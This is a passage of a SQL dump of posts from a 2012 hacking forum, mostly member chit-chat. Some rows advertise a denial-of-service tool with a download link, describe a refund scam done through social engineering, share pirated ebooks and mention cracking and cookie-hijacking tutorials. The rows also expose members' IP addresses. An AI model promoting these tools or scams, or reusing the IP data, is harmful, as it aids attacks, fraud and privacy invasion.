'0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('626', '175', '617', '42', 'RE: Is Apple really the most valuable company?', '0', '1', 't3h jok3r', '1345666663', '[quote=\'iTzIpod\' pid=\'617\' dateline=\'1345645081\'] [quote=\'t3h jok3r\' pid=\'614\' dateline=\'1345641476\'] [quote=\'iTzIpod\' pid=\'600\' dateline=\'1345595912\'] I\'m an Apple fan :p If you see in my name, it says \"Ipod\" =] [/quote] Honestly, I also like Apple products. What kind of Ipod do you have? [/quote] I got an iPod Touch 4th Generation 32GB. I really want the iPod Touch 5th Generation when it comes out though! Look at the features. http://www.apple.com/ios/features.html [/quote] I have the same Ipod generation and space.', '41.174.7.146', '699271058', '1', '0', '0', '0', '1', '4189a923940408db12e99649088624d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('627', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345668585', 'What? What do you mean took my username? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca1735406e9403c114f7407efa46aef0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('628', '164', '624', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1345668699', '[quote=\'t3h jok3r\' pid=\'624\' dateline=\'1345665814\'] [quote=\'iTzIpod\' pid=\'618\' dateline=\'1345645289\'] [quote=\'t3h jok3r\' pid=\'607\' dateline=\'1345597357\'] Thanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads. [/quote] I noticed that button. I thought that my thread was closed xD and then I hovered my mouse over it and it said Close Thread. I was like alright. It\'s probably because I\'m Upgraded. So I checked the Upgrade page and was like Oh. Alright then. Nice feature. It will be useful! =] [/quote] Honestly, this feature existed since the start but because we switched to a new theme, the feature couldn\'t be written on the new theme. I believe all our features are working properly now. [/quote] Don\'t worry. I\'ll report any bugs I encounter. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '385c6d359689c1bebb52399d87dbf9cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('629', '185', '0', '4', 'Hey', '0', '90', 'duhuh', '1345670869', 'so this is me saying hi, i came from Happy Forums, looking forward to see the SEO section:)', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '502832833f47fcf4c1be660e3873d66b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('630', '176', '586', '12', 'RE: [Tut]How trace an email', '0', '90', 'duhuh', '1345670941', 'wow thats sick thanks for the share!', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '17367710eb000a274368f44a91ca53e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('631', '139', '564', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '90', 'duhuh', '1345671143', '[quote=\'Sin Cara\' pid=\'564\' dateline=\'1345559956\'] [quote=\'iTzIpod\' pid=\'536\' dateline=\'1345556489\'] When I try to go on http://skype.hotspotshield.com/banner.php I get this message saying Temporarily Unavailable! :/ [/quote] Don\'t worry..... Just wait ;) [/quote] Hey so how long should we wait, and refresh for?', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'd1ab1b412bfad65e973a1057208e51e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('632', '148', '395', '12', 'RE: [Tutorial]How to use Cookies and access Premium Accounts', '0', '90', 'duhuh', '1345671202', 'Does this work still, i only ask as it has megaupload in the list and so may not be working still? Edit, also i then tried it, http://gyazo.com/658f6672eb5507d013987eb788794d11 and when i hit enter i get a error,', '86.182.139.218', '1454803930', '0', '0', '90', '1345671308', '1', 'f29c2c0da207842b58be624981e47e7a', '0', '1345671308'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('633', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '90', 'duhuh', '1345671429', 'Can this be removed? will anyone here actually do a survey? Sorry but I really don\'t think you should post Survey links here, its just gay as fuck.', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'c39b39aee4ede7bac6f457172356bebb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('634', '182', '619', '49', 'RE: Upgraded Forum', '0', '20', 'JakeUS', '1345672633', 'I like this idea, hope it is added.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '971a15b946ae18ce0cf8e4a0301af4de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('635', '185', '629', '4', 'RE: Hey', '0', '20', 'JakeUS', '1345673077', 'Welcome to the site.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '46f8bb2d27005f69997fd485ec682939', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('636', '185', '629', '4', 'RE: Hey', '0', '61', 'NXK', '1345674110', 'Welcome, I hope you enjoy it here.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '3839b8218d5d50736ff0037b40bf6f9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('637', '182', '619', '49', 'RE: Upgraded Forum', '0', '1', 't3h jok3r', '1345675832', 'I was actually on this thread about an hour or two ago and was going to add a forum, but I had to code some stuff first which were pending for over a week. I will add the section by today. Thanks for the suggestion.', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', 'c3988ddcf00aa456bd0695013d4a0767', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('638', '186', '0', '16', 'SE razor?', '0', '90', 'duhuh', '1345678480', 'Anyone know a guide to do this at all? some people say it is really simple? anyone know? thanks', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'e1e8d14de7e15329f14075729dcac53d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('639', '185', '629', '4', 'RE: Hey', '0', '1', 't3h jok3r', '1345678521', 'Welcome to L33THacking, Feel free to contact any staff member if you have any problems or questions.', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', '1dfab606ca789f09e7e35f612527c628', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('640', '187', '0', '3', 'Public Downloads?', '0', '1', 't3h jok3r', '1345678843', 'I was wondering if I should make a rule where all the downloads links are public, no post here and PM mes\' for all the forums that distribute programs and tools? The chances would increase for leeching and links would die out soon but what does the forum think?', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', '81e8d32667bf9502ba2c793cb04176c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('641', '188', '0', '59', 'MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '2', '90', 'duhuh', '1345679003', 'I do not claim to own any of these, i got them from a guy on HF who made me do a survey for them ... but just a direct link for you guys, https://www.dropbox.com/sh/i9g0p95v35qj3bu/WLy-dg5EeQ pictures. http://gyazo.com/809fd504a72a70acd8de37cf42de4600 http://gyazo.com/0815e30855e1234dd25e084e7aab9f01 http://gyazo.com/a9308c7b830e8f37998f75e7b2ebe072 http://gyazo.com/b6014a9992456278d52f29a36f9c63d0 as you can see theres a fuck ton. have fun, I say limited as i believe dropbox will only do a certain amount of downloads, when the time comes ill try and upload it to mediafire.', '86.182.139.218', '1454803930', '0', '0', '90', '1345738000', '1', 'cb3deef8d8c0730858b7e546a841cc4e', '0', '1345738000'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('642', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited}', '0', '1', 't3h jok3r', '1345679286', 'God damn, that\'s hell of a ebooks. Thanks for the massive contribution. You don\'t have an Ebook that I have, want to know which one? [spoiler] A masturbation Ebook ;) [/spoiler]', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', 'f97d15d07609dabcafe9ce2a298e1e06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('643', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited}', '0', '7', 'Romdu62', '1345681046', 'Viewing from my phone but according to what I see those are a lot of ebooks.', '41.174.8.53', '699271221', '0', '0', '0', '0', '1', '39e8890e0ee9871e28ef6ca022250312', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('644', '57', '431', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '7', 'Romdu62', '1345681211', '[quote=\'sirchamp\' pid=\'431\' dateline=\'1345392491\'] Reupload please. Thank you [/quote] The problem is that LH bots keep on spamming the link with views so it keeps on getting removed. So updating it would be useless I guess, but lets hope the OP does :D', '41.174.8.53', '699271221', '0', '0', '1', '1345681282', '1', 'f20f68469a450a09f83a5c0208b6e4f8', '0', '1345681282'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('645', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '100', '??zg???g????61', '1345684691', 'alrighty I\'m kinda scared. I just did this, they are sending a replacement but they have told me that I have to send broken one back, which I obviously cant do. What do I do???? [hr] If I don\'t in thirty days they will charge the credit care(VCC), I could care less about that, but they have my address?', '70.16.221.26', '1175510298', '1', '0', '100', '1345733623', '1', '79bc5ffa2c71f4cb49eecd184d0090db', '0', '1345733623'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('646', '185', '629', '4', 'RE: Hey', '0', '82', 'iTzIpod', '1345689206', 'Welcome to L33t Hacking! Once a L33t, Always a L33t! Enjoy your stay!', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '79cea4b0cb1ba4d266219539a71c0baf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('647', '187', '640', '3', 'RE: Public Downloads?', '0', '62', 'R?????zo?', '1345712561', 'I think the PM system is quite good, it forces the user (even if its leeching) to bump the thread which will prevent the thread to getting old. Instead of just downloading and don\'t even say thanks and the thread will just die there (not alot of people use the search bar they just look to the new threads)', '95.69.45.190', '1598369214', '1', '0', '0', '0', '1', '68902bdad6812ce48691acb7ab20c5df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('648', '186', '638', '16', 'RE: SE razor?', '0', '62', 'R?????zo?', '1345712972', 'http://www.mediafire.com/?crgc59o9mwjzc75 There you go. I take no credits, it was given by someone on HF.', '95.69.45.190', '1598369214', '1', '0', '0', '0', '1', 'a2655db11f58fad0396cc05dcb52ae3b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('649', '148', '395', '12', 'RE: [Tutorial]How to use Cookies and access Premium Accounts', '0', '54', 'Sin Cara', '1345717785', 'But it works fine for me ;)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', '797d8afedb02d81428e32c15e7f6cd77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('650', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345720020', 'I don\'t know Bro... sorry for that ;)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', '356f4aa623ce9448c9d6618270dac239', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('651', '150', '398', '12', 'RE: [TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '54', 'Sin Cara', '1345720070', 'Thanks for the nice feedback ;)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', 'dc4029a8e40c98e4d980db152c4e22b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('652', '189', '0', '49', 'Webmaster Section', '0', '54', 'Sin Cara', '1345720201', 'I think there should be a webmaster section so members can discuss about domain, hosting and other stuff related to webmaster.', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', 'b0b8609ab505b09dd5da220e01b6b454', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('653', '149', '584', '12', 'RE: How to crack your Internet Download Manager forever', '0', '54', 'Sin Cara', '1345722491', '[quote=\'Triple H\' pid=\'584\' dateline=\'1345592116\'] I would give this a try, would you recommend doing a backup before doing this? [/quote] Yeah, it will be better to make back up before :)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', 'c71fbb2859e175e88f0eecd9e2044ede', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('654', '189', '652', '49', 'RE: Webmaster Section', '0', '82', 'iTzIpod', '1345730037', 'We need more members first. -1.', '216.172.135.132', '-659781756', '1', '0', '82', '1345758884', '1', 'a7ec4e75b458bb25b56900e47890caab', '0', '1345758884'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('655', '179', '593', '34', 'RE: [tut] Multiple 3D text tutorials', '0', '82', 'iTzIpod', '1345730342', 'Thank you. :p Nice release <3', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '2fb4fdf1458679e79190b74f206b756c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('656', '187', '640', '3', 'RE: Public Downloads?', '0', '82', 'iTzIpod', '1345730390', 'I disagree with this suggestion. Right now, the forum needs more activity going on. So leecher or not they need to post. And that post contributes to the forum\'s total posts.', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '443951676c49443c3d4f1d429814a1a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('657', '184', '622', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345730483', 'It\'s alright. Also, if I ever got a video I need edited, I will come to you. =] What game is this? Also, what system? PS3, Xbox 360, PC?', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '2134c30ece1be25f1e1a8739338b1c7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('658', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited}', '0', '90', 'duhuh', '1345737841', 'Yep it\'s a hell of alot of books, what would be cool is if someone can do a review on one which you find particularly good, or interesting.', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '1ca59511e3bbaca6ad8cfd7f93b50d95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('659', '186', '638', '16', 'RE: SE razor?', '0', '90', 'duhuh', '1345738251', 'thanks man, god why do we have a message minimum', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '1b338e5a6d054907bba44480291d7375', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('660', '184', '657', '35', 'RE: [Video] I\'m a video editor!', '0', '61', 'NXK', '1345738559', '[quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\'] It\'s alright. Also, if I ever got a video I need edited, I will come to you. =] What game is this? Also, what system? PS3, Xbox 360, PC? [/quote] It\'s counter strike source for PC', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '645a0d07edb6bd864a937bc6961279d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('661', '186', '638', '16', 'RE: SE razor?', '0', '61', 'NXK', '1345743817', 'It\'s quite easy, All you need is a friend with the item you are trying to SE.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '4d8ff79da75dfc4719714abb3e94558b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('662', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '61', 'NXK', '1345744483', 'This is nice, I have my own API like this And iv been thinking about creating one but I guess you got that under control! Nice release.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'a32d608ac0976a7fce6073af9b880cf7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('663', '187', '640', '3', 'RE: Public Downloads?', '0', '20', 'JakeUS', '1345745346', 'Maybe a plugin where you either have to post or have 50+ posts?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'eaaff92fbe5341184f82afdb3df492e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('664', '187', '640', '3', 'RE: Public Downloads?', '0', '53', 'sirchamp', '1345745487', 'In my opinion its fine as it is.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e1b566f87e6d17a07c6cd038d41093dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('665', '190', '0', '56', 'Copy and paste game', '0', '61', 'NXK', '1345746025', 'What do you have copy/pasted right now? without changing it! mines this http://www.dell.com/us/p/alienware-x51/pd.aspx Showing my brother a small pc for his new apartment that\'s small with a good payment plan', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'db40d4aadabbf24eb7f1d8758e6ceb22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('666', '191', '0', '15', 'ProDos v1.0', '0', '53', 'sirchamp', '1345746532', 'ProDos 1.0 is twice as powerfull as Loic or Serverattack. It\'s a very strong Dos Tool. Coded in C++ by 0v3rd0z3r aka SatansWrath [color=#000080]Screenshots:[/color][color=#FFFFFF] [img]http://i50.tinypic.com/25i5j0n.jpg[/img] [img]http://i46.tinypic.com/xpbj9d.jpg[/img] [img]http://i49.tinypic.com/2qkmpt4.jpg[/img][/color] [lock][color=#000080]Download link:[/color][color=#FFFFFF] http://www.mediafire.com/?44jcdf6gzfo78ui[/lock] [/color][color=#000080]Virusscan:[/color][color=#FFFFFF] http://virusscan.jotti.org/de/scanresult/f82dd4cc8e7aa93880ba9cc433690999a1658d60 [color=#FF0000]7/20 35%[/color] [/color]', '188.155.56.90', '-1130678182', '1', '0', '1', '1352012096', '1', 'de919c04b85e68ee4ff080a94e7d20f4', '0', '1352012096'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('667', '192', '0', '49', '[Suggestion] Forum Games Section', '0', '82', 'iTzIpod', '1345749254', 'In this section, allows users to post a Forum Game thread. Such as Last person to reply wins Ban the user above you Count to 1000 Etc. And since I just saw a Forum Game thread in the [url=http://l33thacking.com/forumdisplay.php?fid=7] Off Topic Section[/url], I don\'t want people to be spamming threads or posts just to get their posts up. I was previously on a different forum where one of the members have done so. So anyways, this Forum Games section contains all the Forum Games threads. And if you post in these threads, you don\'t get your post count up.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4de8d18d9dffd770d4436e0e4aa1665', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('668', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1345749300', 'http://l33thacking.com/forumdisplay.php?fid=7 I just made a suggestion and this was the latest thing I copied and pasted.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a15a62169495d929651eee1a76e753b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('669', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '82', 'iTzIpod', '1345749545', 'Still temporarily unavailable! :/ Been 2 days.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a9eda3fccdd9a057812ea5da3a53f1f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('670', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '82', 'iTzIpod', '1345749631', 'I\'ll see whats inside. ;) Nice release. EDIT: Download Link is broken.', '24.212.197.164', '416597412', '1', '0', '82', '1345749699', '1', '7965c54f4bd5ae3ec771e48095a760c1', '0', '1345749699'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('671', '184', '660', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345749808', '[quote=\'NXK\' pid=\'660\' dateline=\'1345738559\'] [quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\'] It\'s alright. Also, if I ever got a video I need edited, I will come to you. =] What game is this? Also, what system? PS3, Xbox 360, PC? [/quote] It\'s counter strike source for PC [/quote] Oh. Do you have a HDPVR with a Xbox 360 or Ps3 with CoD Games? :p', '24.212.197.164', '416597412', '1', 